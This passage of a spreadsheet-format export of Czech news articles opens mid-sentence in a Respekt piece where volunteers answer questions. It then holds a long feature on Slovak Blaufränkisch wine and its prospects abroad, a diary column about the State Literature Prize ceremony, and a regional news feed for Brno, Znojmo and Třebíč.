pod ním břeh a udělaly se v něm trhliny. 3. Všichni to chápali. A bylo i ku prospěchu mým dětem, mám tři, že viděly, že je dobré lidem pomáhat. Nejstarší, devatenáctiletý taky dobrovolničil. 4. Pomoci nikdy. Ale když jsem viděla, že pomoc v obci není organizována tak, jak by mohla být, litovala jsem, že to tak je. Věděli jsme, že o vesnici dál to funguje dobře, že to jde, vzít auta a třeba rozvážet teplé jídlo lidem, co dřou ve svých domech. 5. Nejsem z duše žádný spasitel a záchranář. Ale bylo mi líto těch zatopených lidí. 6. Doufám, že další katastrofa už nepřijde. doučuje jednou týdně žačky a žáky základní školy 1. Dobrovolnictví je skvělé, protože poznáváte statečné lidi, kteří denně překonávají překážky, které by běžného smrtelníka položily. Je to smysluplná a inspirující činnost. 2. My se smějeme neustále, protože máme dobrý vztah s rodinou a koordinátory z Člověka v tísni. Často spolu vtipkujeme a snažíme se vidět pozitivní stránku každé situace, protože pocit naděje je nesmírně důležitý a silný. Samozřejmě probíráme i seriózní témata, u kterých se smích vůbec nehodí, ale překvapivě jsem zatím nebrečel, přestože u mě občas stačí málo. 3. Ano, mám velké štěstí, že rodina, přítelkyně a blízcí přátelé mě podporují. Pro mě je to nesmírně důležité, zejména když si v rámci doučování procházíme těžkým obdobím. 4. Když vnímám nespravedlnost a to, že jsou lidé schopní někoho ohodnotit a odsoudit, aniž by o něm cokoli věděli nebo si ho alespoň vyslechli. 5. Náhodně jsem potkal kamarádku ze střední v metru. Mezi Bořislavkou a Můstkem mi stačila říct, v čem program dobrovolnictví spočívá a komu pomáhá. O týden později jsem napsal e-mail, že bych o to měl zájem. 6. Ano, těším se, až se zase uvidíme a popovídáme si, co se za týden stalo a co je nového. A také až se zase něčemu zasmějeme. dobrovolničí příležitostně 30 let, nyní doučuje děti v Praze 1. To, že je to čistá vnitřní motivace – dělám to, protože chci a dává mi to smysl. Když by to tak být přestalo, mohu s tím dobrovolně skončit. Mohu investovat čas do tématu, kterým právě žiji. 2. Když doučuji, směji se často, protože humor odlehčí náročné učení a povzbudí dobrou náladu. Usmívám se a mám radost, když se od dítěte dozvím, že díky společné hodině pochopilo novou souvislost a že ho bavilo všechno, co jsme dělali. Nepláču, ale občas je mi smutno, když vidím, jak moc podrobně se děti na základce učí některá témata. Přála bych si, aby děti chodily do školy rády, protože tam mají příležitost a podporu realizovat své nápady vycházející z jejich silných stránek. Nechápu, proč některé děti trápit složitými výrazy se zlomky, když je pro ně obtížné porozumět představě zlomku. Přitom mají potenciál vyniknout v jiných oblastech. 3. Myslím, že ano. Doma se syny se hodně bavíme o společenských problémech. 4. Nikdy jsem nelitovala. 5. S podporou ekologických kampaní, třeba upozornění na hrozbu globálního oteplování, jsem začala na střední škole, protože jsem chtěla pomoct zachovat životní prostředí pro příští generace. K doučování pro Člověka v tísni jsem se rozhodla, protože učím v inovativní škole, kde se platí školné. Zdá se mi, že v Praze roste počet rodičů s pocitem, že umístěním do veřejné základky jejich dítě něco ztratí, třeba je nevybaví důležitými kompetencemi pro budoucnost. Naproti tomu jsou děti, které současný systém nedovede dostatečně podpořit, nezažívají ve škole úspěch a často z těchto důvodů ze vzdělávání vypadnou předčasně. Baví mě trávit čas s lidmi, rozšiřovat si tím horizonty a rozvíjet svou empatii. Doučuji, protože chci dělat něco pro to, aby se sociální bubliny malinko prolnuly. 6. Těším se, ale mám i obavy, jestli doučování dovedu připravit užitečně. Někdy od dítěte cítím vděčnost za mé dobrovolné učení, a to silněji než ve svém zaměstnání. Když se hodina povede, je to naplňující. Pokud jste v článku našli chybu, napište nám prosím na [email protected] . Autor: Respekt Rubrika transition_slide Kontext, Dobročinnost, Dobrovolníci</t>
  </si>
  <si>
    <t>20241201_136_3476435683_baff3436d2941c72d88b.html</t>
  </si>
  <si>
    <t>baff3436d2941c72d88b</t>
  </si>
  <si>
    <t>Stane se slovenská frankovka světovým vínem? Potenciál na to má, tvrdí odborník</t>
  </si>
  <si>
    <t>Stane se slovenská frankovka světovým vínem ? Potenciál na to má, tvrdí odborník Jaké víno ze Slovenska či ze střední Evropy by mohlo uspět na světovém trhu? Více než třicet let po pádu komunismu a více než dvacet let od doby, kdy si globální konzumenti začali všímat modré frankovky, je odpověď stále nejasná. O této otázce diskutují slovenský vinař Vladimír Magula a německý vinný kritik a publicista Stephan Reinhardt. Možná je to náhoda, možná zde působí i duch místa. Z pahorků u Suché nad Parnou se rozhlížíme po okolí: na jedné straně panorama Trnavy , na druhé Záruby, nejvyšší vrchol Malých Karpat. Ve středověku pod horou vedla Česká cesta, obchodní spojení s Prahou , Německem a Západem. Pod námi leží Růžová dolina, hned vedle Vlčí dolina, „Vlčindol“, kam František Hečko umístil své Červené víno . Celý tento kraj spolu se svou minulostí jako by říkal: „Vyrábějte zde víno červené, a pokud se povede, vezměte ho do světa.“ Pokud tedy bude červené, tak by to na Slovensku zřejmě měla být frankovka, protože těch máme z modrých odrůd ve vinicích historicky nejvíce. Rodina Magulových ji po restituci pozemků, které tvoří základ jejich několikahektarového rodinného vinařství, vysázela v roce 2007 jako první ze všech odrůd. V posledních letech ji vyrábějí různými způsoby – od růžového po červené, od cuvée s portugalem pod názvem „Růžový vlk“ až po ambiciózní odrůdové víno s názvem „Rosenberg“. Používají různé délky macerace, často i několikatýdenní, a různá omezení techniky, někdy dokonce i zcela bez použití strojů poháněných elektřinou – tedy, jak říkají oni, „unplugged“. Od roku 2015 vyrábějí vína i s certifikátem Ecocert, který reguluje výrobu organických vín. A ano, svou frankovku berou i do světa. V květnu se spolu s několika dalšími slovenskými vinařstvími zúčastnili výstavy United Nations of Blaufränkisch, která proběhla ve vídeňském Hofburgu během tradiční konference VieVinum. „Asi nejvíce mě potěšila zpětná vazba od jednoho kodaňského restauratéra s tisícovkou vín na vinném lístku – a nejen naturálních. Řekl mi, že o slovenské frankovce skoro nic netušil, ale že celý slovenský flight byl ve srovnání se sousedy ‚next level‘,“ uvedl Vladimír Magula kolegům vinařům, které ve Vídni „zastupoval“. „Spojené národy“, jak výstavu nazvali organizátoři z agentury Wine+Partners , byly narážkou na to, že vinaře střední Evropy spojuje právě tato odrůda – a že by se díky ní mohli profilovat na globálním trhu. Jenže až tak jednoduché to není. „Frankovka není odrůda, která by konzumenta dokázala spontánně okouzlit,“ říká Stephan Reinhardt, německý vinný kritik a publicista. Je autoritou v otázkách středoevropských vín a frankovku sleduje více než dvacet let. „Na to je tato odrůda příliš komplikovaná,“ vysvětluje. „Při ochutnávání je to potřeba mít na paměti.“ Foto Miro Nôta Vladimír Magula Koncem minulého tisíciletí se na nějaký čas zdálo, že stále teplejší klima mnohé ze specifických vlastností frankovky vyřeší a díky každoročně dobře vyzrálému hroznu začnou vína „zářit“ po celém světě – ať už samostatně, nebo v cuvée s „velkými“ mezinárodními odrůdami. „V té době mnoho vinařů v Burgenlandu vysazovalo odrůdy, jako je Cabernet Sauvignon, Merlot nebo Syrah,“ vzpomíná Reinhardt. „Tato vína jsem však často vnímal jako relativně nudná. Frankovka má dobrou hloubku i komplexnost, a tak jsem tehdy napsal pár slov o tom, že vůbec nechápu, proč bychom ve střední Evropě měli pěstovat mezinárodní odrůdy, když máme tak dobrou vlastní. I v extrémně suchých regionech, ba dokonce ve stepi u Neziderského jezera si zachovává svůj charakter. Ani v teple nezískává tak rychle vysokou cukernatost, a tudíž ani potenciálně vysoký obsah alkoholu .“ Proto nemusí sklouzávat k podobě sice mohutného, ale nezajímavého a plochého vína , pokračuje kritik. „Pro teplé klima by vlastně měla být ideální. Ale pozor, frankovka má v sobě i něco, co mnoho jiných odrůd nemá: velmi silné kořeněné tóny v chuti, které některé zákazníky přímo iritují. Ve sklenici může působit až divoce, často v podobě vína s výrazným aromatem lesního porostu nebo s tóny, které připomínají zeleň, ba dokonce břečťan či kopřivu.“ Před dvaceti lety specifika frankovky globální zákazníky značně vyváděla z míry, a proto se vinaři raději snažili dopěstovat hrozny do plné zralosti. „Mohutná, opulentní vína zákazníci tehdy vnímali mnohem pozitivněji než dnes. Tak jsem se tehdy frankovky trochu zastal,“ vzpomíná kritik. Rodina Magulových rozbíhala své vinařství o něco později, v době, kdy už na Západě probíhal příklon k vínům s elegantnějším projevem. Vinaři začínali omezovat používání nových dubových sudů a do sklepů přibývaly nádoby z terakoty či betonu. Rozšiřovalo se i organické hospodaření, zákazníci začali oceňovat také lokální a originální projev vín. Jaký je tedy styl vín od Magulových? To není opět jednoduchá otázka. Základem jsou sprašové půdy na mírných, ale na okraji údolí i strmých pahorcích ve srážkovém stínu relativně vysokých vrchů, vše v kombinaci s polohou dosti severní pro vinařství. To by mělo zajišťovat dostatek kyselin v hroznech a koncentraci moštu. Vína z těchto poloh často působí svěže, přístupně. Ta lepší vína navíc elegantně, až filigránsky. Nejjednodušeji se však přímočará a přístupná vína vyrábějí konvenčními technologiemi. Magulovi se však rozhodli vzdát nakupovaných kvasinek a velké části běžných postupů, čímž si sami situaci zkomplikovali. Foto Elle Hughes / Unsplash.com Pokud jsou dnes vína Magulových rozpoznatelná napříč odrůdami – pěstují také Devín , Vlašský ryzlink, Veltlínské zelené a z modrých odrůd Dunaj , Hron a Rosu – je to i díky tomu, že našli způsob, jak se podepsat i pod vína , která vznikají s omezeným zásahem vinaře. Možností je více a opět jde o postupy, které dnešním vinařům přinášejí schopnost zaujmout zákazníky i na náročnějších trzích. Začátek je ve vinohradě, například i díky přístupu „selection massale“, tedy výsadbou originálních starých klonů z tradičních vinohradů, nikoli ze školek. Takovým způsobem Magulovi vysadili ve vinici Teufelstal (Ďáblovo údolí) na konci Vlčího údolí svou nejsvětovější odrůdu Pinot Noir z Burgundska . Vedle pěstují i alsaský tramín, který by jednou mohl oslovit slovenské zákazníky stejně, jako jeho nyní oblíbená „dcera“ – aromatický Devín. Jaké možnosti má vinař po sklizni? Při zpracování může například lisovat určitý podíl celých hroznů, což vínu dodá bohatší strukturu, zkoušet různé délky macerace, promyšleně používat amfory či jiné nádoby nebo cílevědomě pracovat na tvorbě směsí. Tato rozhodnutí nakonec přispívají k budování celkové identity a značky. Díky pěstování ve Vlčím údolí se ujalo přirovnání cuvée Magulových k vlkům. Mají jich více, od zmíněného růžového vlka přes oranžového až po červeného, ve kterém se mísí nové šlechtěné odrůdy Hron a Dunaj . Pro ty, jak sami Magulovi přiznávají: „My vinaři ještě stále hledáme tu správnou formu.“ Od ročníku 2022 už mají i bílého vlka, bílé víno z modrých odrůd, a také malého „vlčka“ – šumivé víno „Lupo“ z Vlašského ryzlinku z náročného ročníku 2020. Mladá vinařství, zvláště ta ekologická, si mohou – a často musejí – své portfolio vymyslet v podstatě od začátku. V éře teplého klimatu, které je však současně obdobím zákazníků, kteří ve víně dokážou ocenit i severskou „cool climate“ eleganci, se nově profiluje i frankovka. Na degustacích si opakovaně uvědomuji, že tuto odrůdu není možné ochutnávat rychle. Opět je to však dost klikatá cesta, protože vínu se do světa nejjednodušeji jde, když je zapamatovatelné a dá se lehko zařadit. Frankovka se často nedá a možná i proto ji na globálním trhu v pozici vyhledávané „regionální speciality“ již předstihlo mnoho italských, španělských i jiných menších odrůd. „Na degustacích si opakovaně uvědomuji, že tuto odrůdu není možné ochutnávat rychle,“ říká Stephan Reinhardt. „Na každé víno se musíte dobře soustředit: většinou má vysokou kyselinu, relativně vysoký obsah taninů, vína jsou spíše temperamentní, kořeněná, avšak jejich textura není vždy úplně atraktivní. Často se mi stalo, že pokud jsem víno ochutnal znovu v jiném nebo opačném pořadí, nedokázal jsem si potvrdit původní první dojem. Myslím, že neznám jinou odrůdu, která mi při degustaci dělá takové problémy.“ Kyselina, kterou vinaři chválí v teplých letech, může ve slabších ročnících působit příliš dominantně, pokračuje Reinhardt. „I taniny ve frankovce někdy vyčnívají natolik, že vína mají vysokou adstringenci, mohou působit až vysušujícím dojmem.“ Když už narazíte na víno , ve kterém všechny složky zapadnou na správné místo, často to znamená, že jde o starší víno . „Asi musí uplynout určitý čas, aby se jednotlivé složky lépe integrovaly,“ dodává. „Frankovce jednoznačně prospívá, pokud někteří špičkoví vinaři dokážou ekonomicky ustát to, že svá nejlepší vína uvedou na trh až po několika letech. Možná je toto ta nejlepší šance, jak by se frankovka mohla výrazněji prosadit ve světě.“ V úvahách kritika jako by se stále objevovala špetka lítosti nad tím, že tato pěkná odrůda to má ve světě tak těžké. „Uběhlo už pětadvacet let a stále mám potřebu se frankovky zastávat,“ říká trochu nespokojeně. „Přitom už před dvěma desetiletími, při ročnících 2001 a 2002, se ve Vídni sešlo několik vinařů, mezi nimi známá jména jako Roland Velich či Uwe Schiefer, a všichni už tehdy argumentovali, že jde o skutečně skvělou odrůdu. Z frankovky vznikají vína srovnatelná svou hodnotou s Nebbiolo v Piemontu , Pinotem Noir v Burgundsku či Syrah ze Severní Rhôny.“ A přidává i vzpomínku, která ilustruje další schopnost frankovky – napodobovat vzory a současně zůstat svým vlastním vínem . Pokud se odrůda nedokáže prosadit ve světě, na Slovensku to má snad ještě těžší. „Musel jsem se usmívat, když Ernst Triebaumer, přece jen o něco starší, tehdy řekl: ‚Moje frankovka z Rustu nepotřebuje srovnání s Piemontem a už vůbec ne s Bordeaux .‘ A opravdu, jeho víno Mariental, přestože se v průběhu let dost změnilo, je stále vínem , které je originální.“ Vraťme se však na Slovensko : pokud se odrůda nedokáže prosadit ve světě (její hodnocení je třeba brát s rezervou, nejdražší frankovky stojí vysoké desítky eur), na Slovensku to má snad ještě těžší. V posledních desetiletích se slovenští vinaři snažili profilovat spíše prostřednictvím odrůd Dunaj nebo občas i Pinot Noir . Frankovek je méně a nelze říci, že by tvořily jeden celek. Jinak chutná u Pavelky v Pezinku v jeho vlajkovém cuvée Paves, jinak u Botta Frigyesa v Mužle. V Mojmírovicích se objevuje jako „quercus“, tedy „v dubu“, v Levicích , například od Svetíka, nebo v Brhlovicích či Čajkově je opět odlišná. Proto se zeptejme znovu: Jaká je a jakou chce být frankovka Magulových? Tři rozhodující slova, která najdete na webu vinařství, jsou „rovnováha, harmonie a autenticita“. To se sice snadno řekne, ale těžko dosahuje. Znalci i laici si při frankovce rodiny Magulových pomáhají popisy jako „višně, koření, bílé koření, včelí vosk, maliny, hřebíček, skořice, kouř, tabák, kůže, byliny“. Něco z toho lze v jednotlivých ročnících určitě najít, podstatu vína však lépe vystihne pokus o popis jeho charakteru: šťavnaté, živé, nervózní, dobře pitelné, skvělé ke steaku i veganské pizze, ale také trochu záhadné. A ještě několik pokusů o slepou identifikaci: „Jako by šlo o nějaký Syrah ze Severní Rhôny z chladného ročníku, nebo zvláštní víno někde mezi Pinotem a Bordeaux .“ Jak tedy vnímá svou odrůdu sám vinař? „Pro mě je frankovka vyloženě ženská. Fascinuje mě svou pikantností, kořenitostí, rafinovaností až smyslností. Je to víno , které mě baví objevovat, odhalovat jeho vrstvy. Nejvíce mi chutná, když je dobře vyzrálé – tehdy změknou taniny a kyselinky se uhladí. Proto ji obvykle uvádíme na trh až čtyři roky po sklizni.“ „Musím říct,“ pokračuje, „že čím jsem starší a čím déle se vínu věnuji, tím více se mi zdá, že potřebuje více času na to, aby bylo připravené k pití. Je to víno , které chce být respektováno, pomalu odkrývá svá tajemství a odmění toho, kdo mu dá čas, aby ukázalo svůj plný potenciál. Vystihnout „ideál frankovky“ je asi stejný rébus jako postihnout univerzálnost této odrůdy. „Velká vína se často obtížně popisují nebo analyzují,“ myslí si Reinhardt. „Fascinují komplexností, ve které je přítomné všechno: bohatost, nikoli síla, ale zejména nuance, mnohostrannost chutí a vrstev a perfektní vyváženost. Taková vína přinášejí jeden velký moment, který působí jako dílo velkého umění, skoro jako v hudbě. K výraznému zážitku se nemusíte propracovávat,“ vysvětluje. Dodává, že si stále není jistý, zda frankovka všechny tyto kvality dokáže spolehlivě přinést – a jak má vinař k takovému vínu dospět. Foto Profimedia Vinice na Slovensku „V posledních letech si čím dál více uvědomuji,“ podotýká skepticky, „že estetická jednota, společná představa o špičkovém, příkladném víně už dnešnímu světu vína tak jako tak chybí.“ Pokud ideál „příkladného“ vína skutečně zanikl v globalizaci a globálním oteplování, má to své důsledky. „Pokud chcete pomoci odrůdě nebo oblasti, obvykle se postupuje tak, že se zodpovědní začnou bavit o tom, co odrůdě prospívá ve vinici a ve sklepě, a co je vhodné pro konkrétní region,“ vysvětluje Reinhardt. „To vás přivede k definování charakteru vašich vín. Ale časy, kdy se takto dalo cílevědomě pracovat, možná už skutečně skončily. Možná už je každý vinař jen ostrovem sám pro sebe a sám si řekne, co je nejlepší.“ Proto možná zůstane otevřená i ta otázka: Co vlastně frankovka je? Jaký je její ideál? Nemáme ho. V této souvislosti se nabízí ještě další otázka – není to pro Slovensko , z globálního pohledu okrajovou zemi, nakonec výhoda? Nebude spíše šancí, pokud světoví konzumenti nebudou mít od slovenských vín téměř žádné konkrétní očekávání? Kam tedy frankovka směřuje v posledních letech? „Aktuálně se mi frankovky od ročníku 2020 a později hodnotí obtížně, protože náš aktuální ročník na trhu je 2019, a ročník 2020 uvedeme až před Vánoci,“ připomíná Vladimír Magula. „Obecně se ale dá říci, že druhá polovina předchozí dekády byla velmi příznivá pro červená vína , zejména pro pozdně dozrávající frankovku. Ročníky 2017, 2018 a 2019 byly podle mě mimořádně kvalitní a zajímavé.“ Během posledních – již téměř tří – mimořádně teplých dekád se ukázaly být určitou výhodou občasné chladnější či vlhčí roky, zejména pro červená vína . Například k poměrně teplému, ale extrémně deštivému ročníku 2014 se u nás přidal i první pandemický rok. „Ročník 2020 byl poměrně náročný, celkově spíše chladný a zejména s deštivým zářím,“ vysvětluje Magula. „Frankovka, která patří mezi naše nejpozději dozrávající odrůdy, tehdy dost trpěla – alespoň v případě našeho vinařství. Musím ale říci, že když jsem ji před pár dny ochutnal, konečně se mi začíná líbit natolik, že ji mám chuť pít. V řadě stále teplejších a výraznějších ročníků bude mít své jedinečné místo.“ Oteplující se klima posunulo v posledních dekádách termín sklizně o celé týdny, hluboko do letních měsíců. Zrychlené, někdy až extrémně rychlé zrání hroznů ve vinici přináší velké změny i do práce vinařů. „Právě v čím dál teplejších letech, při úrodách dozrávajících dříve, mě frankovka nesmírně fascinuje,“ přiznává Magula. Slovensko je jedinou zemí na světě, která má frankovku mezi třemi nejčastěji vysazovanými odrůdami. „I v rekordně teplých ročnících, jako byl například 2023 nebo 2018, kdy se hrozny sklízely zhruba o dva až čtyři týdny dříve než obvykle, dozrávala stabilně. Bez ohledu na extrémní výkyvy počasí či horka. Sklizeň se přitom konala v podobném čase jako v chladnějších ročnících. Tato její tvrdohlavost, samostatnost a nezávislost jsou dalšími rozměry, které považuji za součást kouzla této odrůdy.“ „Málokdo si také uvědomuje,“ připomíná vinař, „že Slovensko je jedinou zemí na světě, která má frankovku, alespoň formálně, mezi třemi nejčastěji vysazovanými odrůdami. Mezi tři nejčastěji zastoupené odrůdy ve vinicích z pohledu rozlohy vinohradů nepatří frankovka ani v Maďarsku , ani v Rakousku ,“ zdůrazňuje Magula. Slovensko by tedy teoreticky mělo být zemí, která se na frankovku téměř až specializuje. „V Rakousku a Maďarsku , dokonce i na Moravě , se s frankovkou pracuje mnohem cíleněji,“ vysvětluje vinař. „Zaměřují se na její výjimečnost a terroir. V těchto zemích funguje řada vinařství, pro která je frankovka vlajkovou lodí, a věnují se jí dlouhodobě a systematicky. Myslím si, že právě zde má Slovensko velký prostor pro zlepšení. Slovenská frankovka je – podobně jako jiné odrůdy pěstované za socialismu, kdy hlavním kritériem byly hektarové výnosy – poznamenaná i svou minulostí,“ dodává. „Dokáže zajistit velký výnos, ale kvalita rapidně klesá. Pokud chceme mít výjimečnou frankovku, musí pocházet nejen z kvalitních poloh, ale také z vinic s přiměřeně nízkými výnosy, které zajistí dostatečnou koncentraci a kvalitu hroznů,“ soudí Magula. Posledním významným faktorem, který ovlivňuje potenciál vína , jsou konkrétní polohy vinic. „Frankovka je vděčná na pěstování a daří se jí i v méně kvalitních polohách, což je ale někdy dvojsečná zbraň,“ upozorňuje vinař. „Při zakládání vinic se často vysazuje na místech, která nejsou vhodná pro náročnější odrůdy, které jsou možná marketingově atraktivnější. Kvůli tomu často nemá šanci dosáhnout na extra třídu hroznů, jakou by mohla poskytovat.“ Podobný strukturální problém frankovky zmiňuje i Stephan Reinhardt: v Německu se její výsadby často nacházejí až na druhém místě po Pinotu Noir a slabší profil „Lembergera“, jak se frankovce v Německu říká, tomu odpovídá. Kromě rozhodnutí vinařů a módních změn ve víně by však podle Reinhardta měla budoucnost odrůdy zásadně ovlivnit právě změna klimatu. „Potenciál frankovky by se mohl naplno projevit tehdy, až zeslábne potenciál jiných odrůd,“ uvažuje kritik. „Například pokud už bude pro Pinot Noir příliš teplo – a dalším velkým kandidátem na problémy kvůli teplu je Merlot. Frankovka snáší teplo dobře také proto, že má poměrně bujné listy, které jí poskytují stín, a rostlina je celkově robustní. Pro vinaře navíc není tak rozmarná jako Pinot.“ Každoroční festival se snahou propojit středoevropská vína , včetně srovnávacích degustací, je již pátým rokem letním lákadlem v Magulově vinařství. Alespoň jedna věc je o frankovce jasná: je to naše středoevropská, „habsburská“ relikvie. „Nepatří jedné zemi, a právě proto je koncept United Nations , kde ekonomicky silné Rakousko pomáhá sousedům, velmi sympatický,“ míní Reinhardt. „Pro víno sice přeshraniční spolupráce není typická, ale to nemusí znamenat, že nemůže být přínosná. Možná budou právě tyto země první, kterým se skutečné partnerství podaří.“ Autor: Peter Matijek Autor person Peter Matijek</t>
  </si>
  <si>
    <t>25950</t>
  </si>
  <si>
    <t>20241201_137_3476439594_6bfdb4bf837eadafdced.html</t>
  </si>
  <si>
    <t>6bfdb4bf837eadafdced</t>
  </si>
  <si>
    <t>Den s&amp;nbsp;literaturou</t>
  </si>
  <si>
    <t>Den s&amp;nbsp;literaturou Vstávám v 5.00 v našem brněnském bytě. Původně jsem se měla probudit o několik hodin později u manželovy maminky ve Slaném, ale dcera má noční službu, takže na tradiční dušičkovou návštěvu se vydal včera manžel sám, zatímco já hlídám dceřina pejska jménem Dante. Ten se už těší na procházku a vůbec nebere ohled na to, že já mám před sebou mnohem delší cestu. V chladném ránu Dante nadšeně očichává spadané listí pokryté jiskřící jinovatkou a navzdory tomu, že mě zebou ruce, začínám propadat jeho okouzlení podzimem. Dcera ho z útulku přivezla před necelým rokem, takže spolu listím brouzdáme poprvé. Pamlsek na rozloučenou a spěchám na vlak do Prahy . Tichý vagon je v ranním spoji opravdu tichý. V tašce mám knihu, ale pozoruji podzimně zbarvenou krajinu. Stejně jsem ji četla už dvakrát, cestuje se mnou z úplně jiného důvodu. V představách jsem si děj románu Pavla Kolmačky Canto ostinato (Listopad, prožitky blízké zimy) situovala právě do téže atmosféry s mlhou šedou jako kadidlový dým, která rámuje můj výhled. Letos jsem byla, patrně již naposledy ve svém profesním životě, členkou poroty pro Státní cenu za literaturu. Slavnostního udílení cen jsem se nikdy nezúčastnila, teď jsem však využila toho, že se koná v nedělní večer, a pozvánku přijala. Knížku s sebou vleču proto, aby mi ji autor podepsal, ačkoli jinak sběratelkou autogramů nejsem. S manželem se potkáváme před hotelem. Rychlé ubytování, nezbytná káva a před večerním programem ještě procházka na Olšanské hřbitovy. Couráme se mezi hroby opečovávanými i zanedbanými, slavných a neznámých a slavných, kteří za pár desítek let budou možná neznámí. Mnoha hrobových míst se už dávno zmocnil bující břečťan. Karolině Světlé někdo na náhrobek zavěsil nevkusný věneček potažený fialovou lesklou stuhou tak, že zakryl její jméno. Jméno je to jediné, co dříve slavným literátům zůstalo. O četbě jejich děl si jako pedagožka připravující budoucí učitele českého jazyka a literatury již dávno nedělám iluze. Pokračování výměny SMS s kolegou, který tipuje vítěze. Miluji naše slovní přestřelky, a posílám mu alespoň posměšné smajlíky; ví, že jsem vázána mlčenlivostí. Večer na Nové scéně ND probíhá s přiměřenou dávkou důstojnosti, oficiálnosti, zároveň s prostorem pro spontánní reakce všech, kteří přebírají ocenění. Kamery pro přímý přenos neruší a uvědomuji si, že náladu v sále stejně nedokážou zprostředkovat. Pavel Kolmačka působí v předtočeném portrétu promítaném před udělením ceny plaše a křehce. Když vystoupí na scénu, aby z rukou ministra kultury cenu převzal, skoro ho lituji, protože zjevně nepatří k těm, kteří by si ty chvíle soustředěné pozornosti okolí užívali. Po skončení programu si ho dovolím oslovit v rušném prostoru předsálí, kde právě začíná raut, a pogratulovat mu. Knížka k podpisu zůstává pořád v tašce, najednou mi připadá zbytečné žádat o něj. Kolega mi posílá SMS, že jsme jako porota vybrali výborně. Na hotel se vracíme pěšky, občas nám cestu zkříží povykující skupinka zahraničních turistů posilněných alkoholem , rychlí koloběžkáři s jídelními boxy a potkáváme i jednoho unaveného koníka zapřaženého do fiakru. Staré Město se halí do měkkého oparu jako ze Schikanederových obrazů. Kolmačkův román o odcházení, umírání, hledání a mezigenerační paměti se doma konečně přestěhuje na manželův noční stolek, jako kdybych ho teprve tímto večerem mohla propustit ze čtenářského objetí. Autorka působí jako docentka na katedře českého jazyka a literatury Pedagogické fakulty Masarykovy univerzity . Pokud jste v článku našli chybu, napište nám prosím na [email protected] . Autor: Milena Šubrtová Autor person Milena Šubrtová Rubrika transition_slide Jeden den v životě</t>
  </si>
  <si>
    <t>20241201_138_3491577120_eaeb93a1706fc06f3eb4.html</t>
  </si>
  <si>
    <t>eaeb93a1706fc06f3eb4</t>
  </si>
  <si>
    <t>Informace a zprávy ze Znojma a okolí</t>
  </si>
  <si>
    <t>Informace a zprávy ze Znojma a okolí Znojemsko a okolí 20:00 Brno a Brněnsko Brněnský večírek v Praze , Kometa skolila Spartu : Brněnští hokejisté překvapili na ledě pražské Sparty . Po obětavém výkonu zvítězili 4:3 a utnuli krizi. 19:59 Třebíčsko Nejhezčí vánoční strom Třebíčska: Rozzářené symboly Vánoc už zdobí Třebíč i města a obce v jeho okolí. Kde mají podle vás ten nejkrásnější vánoční strom? 17:52 Brno a Brněnsko Pivo za 70 a lístek za 20 korun: Ředitel brněnské hromadné dopravy o cenách jízdného, počtu spojů nebo konci papírových jízdenek. 14:14 Brno a Brněnsko Kouzelné Brno o Vánocích : Svítící město učarovalo čtenářku Yvetu Hrubou. Prohlédněte si její snímky. 11:12 Třebíčsko Požár v Třebíči : Hasiči v noci ze soboty na neděli vyjížděli k požáru ve sběrném dvoře Na Klinkách v Třebíči . 10:51 Znojemsko Pekelná sešlost v Hrušovanech : Zámecký park v Hrušovanech nad Jevišovkou ožije čertovskou sešlostí. Pekelný rej začne od šesti hodin. 10:45 Znojemsko Jak vypadala zabijačka ve Znojmě : Vepřové hody lákaly duhý adventní víkend spoustu lidí na Masarykovo náměstí ve Znojmě . Program doplnily koncerty. 10:00 Znojemsko Adventní prohlídky: Na hradě Bítov pořádají speciální prohlídky. Ještě v neděli čeká zájemce občerstvení v hradní kuchyni. 09:57 Třebíčsko Miminka narozená na Vysočině: Představujeme vám další fotogalerii nově narozených miminek z Kraje Vysočina. 09:12 Brno a Brněnsko Šalinou na Kamechy : Plánuje se prodloužení tramvaje na Kamechy 09:11 Brno a Brněnsko Nejhezčí vánoční stromeček: Zahlasujte v anketě o nejkrásnější vánoční strom Brna a Brněnska. 09:00 Znojemsko Déšť a mlhy vystřídá sněžení: Pro neděli předpovídají meteorologové déšť a teploty 2 až 5 °C. V dalších dnech očekávají déšť se sněhem nebo sněžení. 08:51 Brno a Brněnsko Děsivé životní podmínky: Dům bez východu ukazuje život v brněnské ubytovně. 07:05 Třebíčsko Advent v Borovině: Na sídlišti Za Rybníkem v třebíčské Borovině pokračuje v neděli 8. prosince adventní program. 05:55 Brno a Brněnsko Den bez slunce: Nedělní počasí nabídne především zataženou oblohu s minimem slunečního svitu, teploty se budou pohybovat těsně nad nulou 05:28 Znojemsko Nejhezčí vánoční strom: Vyberte v anketě nejhezčí vánoční strom Znojemska. Hlasovat v okresním kole je možné do 9. prosince. 22:41 včera Brno a Brněnsko Krampusové tančili Macarenu: Na brněnském výstavišti řádili pekelní čerti z Rakouska . 17:46 včera Třebíčsko Nejhezčí vánoční strom Třebíčska: Rozzářené symboly Vánoc už zdobí Třebíč i města a obce v jeho okolí. Kde mají podle vás ten nejkrásnější vánoční strom? 13:04 včera Znojemsko Stavba roku: Znojemský Bazén Louka se přiřadil mezi skvosty oceněné titulem Stavba roku 2024. Bazén otevřel loni v srpnu. 13:00 včera Znojemsko Nejhezčí vánoční strom: Vyberte v anketě nejhezčí vánoční strom Znojemska. Hlasovat v okresním kole je možné do 9. prosince. 12:57 včera Znojemsko Kalendáře 2025: Kalendáře Znojma jsou v prodeji na TIC. Nabízí fotografie z Vinobraní, partnerských měst i přehled kulturních akcí. 12:07 včera Brno a Brněnsko Voda na Brněnsku až na výjimku opět zdraží: Cena za kubík vody v obcích na Brněnsku příští rok znovu stoupne. 11:57 včera Znojemsko Čertovina na zámku: Zámecký park v Hrušovanech nad Jevišovkou ožije čertovskou sešlostí, a to v neděli od šesti hodin večer. 11:39 včera Třebíčsko Vánoční jarmark v Třebíči : V sobotu 7. prosince pořádá Zdravé město Třebíč na Karlově náměstí Třebíčský vánoční jarmark. Začátek je ve 13 hodin. 11:05 včera Znojemsko Otevřené sklepy: Cech vinařů Vrbovec pořádá ve své sklepní uličce Otevřené sklepy. K ochutnání budou vína , ale i svařák či punč 11:00 včera Brno a Brněnsko Boj o život v Bystrci : O život bezvládně ležícího muže bojovali policisté a obyvatelé brněnské Bystrce 10:10 včera Brno a Brněnsko Nejhezčí vánoční stromeček: Zahlasujte v anketě o nejkrásnější vánoční strom z Brna a Brněnska. 10:06 včera Brno a Brněnsko Tipy na akce o víkendu v Brně : Potkejte se s Mikulášem v zoo nebo prožijte vánoční atmosféru na výstavišti. 09:29 včera Brno a Brněnsko Zářící vánoční dům v Bystrci : Zdobí ho více než osm tisíc zářících světýlek. Součástí jsou i rozmanité světelné animace. 